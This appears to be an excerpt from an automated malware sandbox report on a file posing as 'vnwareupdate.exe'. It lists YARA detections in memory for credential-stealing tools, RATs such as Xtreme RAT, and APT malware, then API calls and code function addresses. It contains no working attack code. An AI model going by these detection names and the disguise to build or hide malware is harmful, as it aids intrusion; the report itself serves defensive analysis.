Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a tool used by APT groups - file PwDump.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects an XML that executes Mimikatz on an endpoint via MSBuild Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a process injection utility that can be used ofr good and bad purposes Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects NoPowerShell hack tool Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT and similar malware Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Turla Agent.BTZ Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CommentCrew Malware MiniASP APT Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: X-Agent/CHOPSTICK Implant by APT28 Author: US CERT
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Industroyer related custom port scaner output file Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Industroyer related malware Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware by Chinese APT PLA Unit 78020 - Generic Rule Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware by Chinese APT PLA Unit 78020 - Generic Rule - Chong Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects simple Windows shell - file s3.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects simple Windows shell - file s1.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects simple Windows shell - from files keygen.exe, s1.exe, s2.exe, s3.exe, s4.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects simple Windows shell - from files s3.exe, s4.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PassCV Malware mentioned in Cylance Report Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Turla malware (based on sample used in the RUAG APT case) Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Turla malware (based on sample used in the RUAG APT case) Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Turla malware (based on sample used in the RUAG APT case) Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Red Sails Hacktool - Python Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects an APT malware related to PutterPanda Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from Rehashed RAT incident Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Iron Panda malware DnsTunClient - file named.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Iron Panda Malware Htran Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from the Proofpoint CN APT ZeroT incident Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from the Proofpoint CN APT ZeroT incident Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Chinese APT by Proofpoint ZeroT RAT - file Mcutil.dll Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Malware sample mentioned in Microcin technical report by Kaspersky Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ysoserial Payloads Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FiveEyes QUERTY Malware - file 20123_cmdDef.xml Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FiveEyes QUERTY Malware - file 20123.xml Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FiveEyes QUERTY Malware - file 20120_cmdDef.xml Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FiveEyes QUERTY Malware - file 20121_cmdDef.xml Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects JQuery File Upload vulnerability CVE-2018-9206 Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects CactusTorch Hacktool Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects strings from FIN7 report in August 2018 Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CCProxy config known from Operation Cleaver Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Malware related to Operation Cloud Hopper - Page 25 Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Tools related to Operation Cloud Hopper Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Malware Sample - maybe Regin related Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationDrug - HDD/SSD firmware operation - nls_933w.dll Author: Florian Roth @4nc4p
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Empire - a pure PowerShell post-exploitation agent - file Invoke-Mimikatz.ps1 Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Mimipenguin Password Extractor - Linux Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs a tool used in the Australian Parliament House network compromise Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs a tool used in the Australian Parliament House network compromise Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pirpi Backdoor - and other malware (generic rule) Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pirpi Backdoor Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a tool that can be used for privilege escalation - file gp3finder_v4.0.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a tool that can be used for privilege escalation - file folderperm.ps1 Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a Metasploit Loader by RSMudge - file loader.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Armitage component Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects APT34 PowerShell malware Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects APT34 PowerShell malware Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware sample mentioned in the Silence report on Securelist Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth

Yara detected Xtreme RAT

Show sources

Source: Yara match	File source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Source: C:\Users\user\Desktop\vnwareupdate.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

Code function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040320C

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Code function: 0_2_00404A44	0_2_00404A44
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Code function: 0_2_00406F54	0_2_00406F54
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Code function: 0_2_0040677D	0_2_0040677D
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02C3A220	3_2_02C3A220
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02C86360	3_2_02C86360
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02C72310	3_2_02C72310
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02C376E0	3_2_02C376E0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02C8AFB0	3_2_02C8AFB0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02CA9F50	3_2_02CA9F50
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02C8B4C0	3_2_02C8B4C0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02C8A590	3_2_02C8A590
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02C8ADB0	3_2_02C8ADB0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02D4A220	5_2_02D4A220
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02D96360	5_2_02D96360
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02D82310	5_2_02D82310
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02D476E0	5_2_02D476E0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02D9AFB0	5_2_02D9AFB0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02DB9F50	5_2_02DB9F50
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02D9B4C0	5_2_02D9B4C0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02D9A590	5_2_02D9A590
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02D9ADB0	5_2_02D9ADB0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02DAA220	8_2_02DAA220
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02DF6360	8_2_02DF6360
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02DE2310	8_2_02DE2310
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02DA76E0	8_2_02DA76E0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02DFAFB0	8_2_02DFAFB0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02E19F50	8_2_02E19F50
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02DFB4C0	8_2_02DFB4C0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02DFA590	8_2_02DFA590
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02DFADB0	8_2_02DFADB0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BE42F0	9_2_02BE42F0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BAA220	9_2_02BAA220
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C60200	9_2_02C60200
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C463F0	9_2_02C463F0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C4A3F0	9_2_02C4A3F0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C523B0	9_2_02C523B0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C4E340	9_2_02C4E340
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C36360	9_2_02C36360
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BE2310	9_2_02BE2310
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C44370	9_2_02C44370
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BF6360	9_2_02BF6360
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C4C040	9_2_02C4C040
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C44050	9_2_02C44050
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C521C0	9_2_02C521C0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BD2180	9_2_02BD2180
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C44110	9_2_02C44110
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C4A130	9_2_02C4A130
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C50610	9_2_02C50610
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C48630	9_2_02C48630
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C447C0	9_2_02C447C0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BD07D0	9_2_02BD07D0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C4A7B0	9_2_02C4A7B0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C50730	9_2_02C50730
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C504F0	9_2_02C504F0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C42440	9_2_02C42440
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C64460	9_2_02C64460
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C445C0	9_2_02C445C0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BFA590	9_2_02BFA590
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C425F0	9_2_02C425F0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C525A0	9_2_02C525A0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C44AF0	9_2_02C44AF0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C42AB0	9_2_02C42AB0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BCEA30	9_2_02BCEA30
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C48A60	9_2_02C48A60
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BCEA59	9_2_02BCEA59
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C40BC0	9_2_02C40BC0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C52BE0	9_2_02C52BE0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C3EBF0	9_2_02C3EBF0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C468C0	9_2_02C468C0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C449B0	9_2_02C449B0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C42930	9_2_02C42930
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BD6EA0	9_2_02BD6EA0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C48E90	9_2_02C48E90
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C4CEB0	9_2_02C4CEB0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C06E50	9_2_02C06E50
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C62E70	9_2_02C62E70
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BFAFB0	9_2_02BFAFB0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BC8FC0	9_2_02BC8FC0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C50C10	9_2_02C50C10
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BFADB0	9_2_02BFADB0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C26D80	9_2_02C26D80
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C34DA0	9_2_02C34DA0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C46DB0	9_2_02C46DB0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C64D40	9_2_02C64D40
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C42D70	9_2_02C42D70
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C432F0	9_2_02C432F0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C4B280	9_2_02C4B280
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C532B0	9_2_02C532B0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C07210	9_2_02C07210
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C45380	9_2_02C45380
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C49380	9_2_02C49380
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C43396	9_2_02C43396
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C43398	9_2_02C43398
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C3F370	9_2_02C3F370
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C0737C	9_2_02C0737C
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BED378	9_2_02BED378
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C51330	9_2_02C51330
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C430C6	9_2_02C430C6
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C430C8	9_2_02C430C8
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C47080	9_2_02C47080
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BED020	9_2_02BED020
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C41060	9_2_02C41060
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C2F010	9_2_02C2F010
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C43020	9_2_02C43020
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C451A0	9_2_02C451A0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C51110	9_2_02C51110
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C3F120	9_2_02C3F120
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C43136	9_2_02C43136
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C55130	9_2_02C55130
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BED6B0	9_2_02BED6B0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C016E0	9_2_02C016E0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BA76E0	9_2_02BA76E0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C49650	9_2_02C49650
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C5F610	9_2_02C5F610
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BCF640	9_2_02BCF640
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C437F0	9_2_02C437F0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C5F790	9_2_02C5F790
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C45750	9_2_02C45750
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C4D710	9_2_02C4D710
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BFB4C0	9_2_02BFB4C0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C41470	9_2_02C41470
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02BCF450	9_2_02BCF450
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C27430	9_2_02C27430
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C45589	9_2_02C45589
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C1B5A0	9_2_02C1B5A0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C435B0	9_2_02C435B0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C45510	9_2_02C45510
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C51AD0	9_2_02C51AD0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C43A40	9_2_02C43A40
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C5FA50	9_2_02C5FA50
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C45A70	9_2_02C45A70
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C41A20	9_2_02C41A20
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C43BE0	9_2_02C43BE0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C1BB80	9_2_02C1BB80
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C63B80	9_2_02C63B80
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C5D8C0	9_2_02C5D8C0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C3B950	9_2_02C3B950
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C3F930	9_2_02C3F930
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C69930	9_2_02C69930
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C35E70	9_2_02C35E70
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02B9A220	10_2_02B9A220
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02BD2310	10_2_02BD2310
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02BE6360	10_2_02BE6360
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02B976E0	10_2_02B976E0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02BEAFB0	10_2_02BEAFB0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02C09F50	10_2_02C09F50
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02BEB4C0	10_2_02BEB4C0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02BEADB0	10_2_02BEADB0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02BEA590	10_2_02BEA590

Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02BDC5A0 appears 43 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02C5A840 appears 63 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02BD5810 appears 69 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02C65870 appears 63 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02C6A840 appears 577 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02BE99B0 appears 67 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02BDAA60 appears 34 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02CFA840 appears 63 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02E6A840 appears 63 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02BD57D0 appears 130 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02D5D470 appears 45 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02BB4570 appears 34 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02D75870 appears 63 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02DD5870 appears 63 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02BAD470 appears 45 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02BD5890 appears 43 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02BD5870 appears 398 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02C00EC0 appears 47 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02BC5870 appears 63 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02BE3160 appears 111 times
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: String function: 02BB43E0 appears 318 times
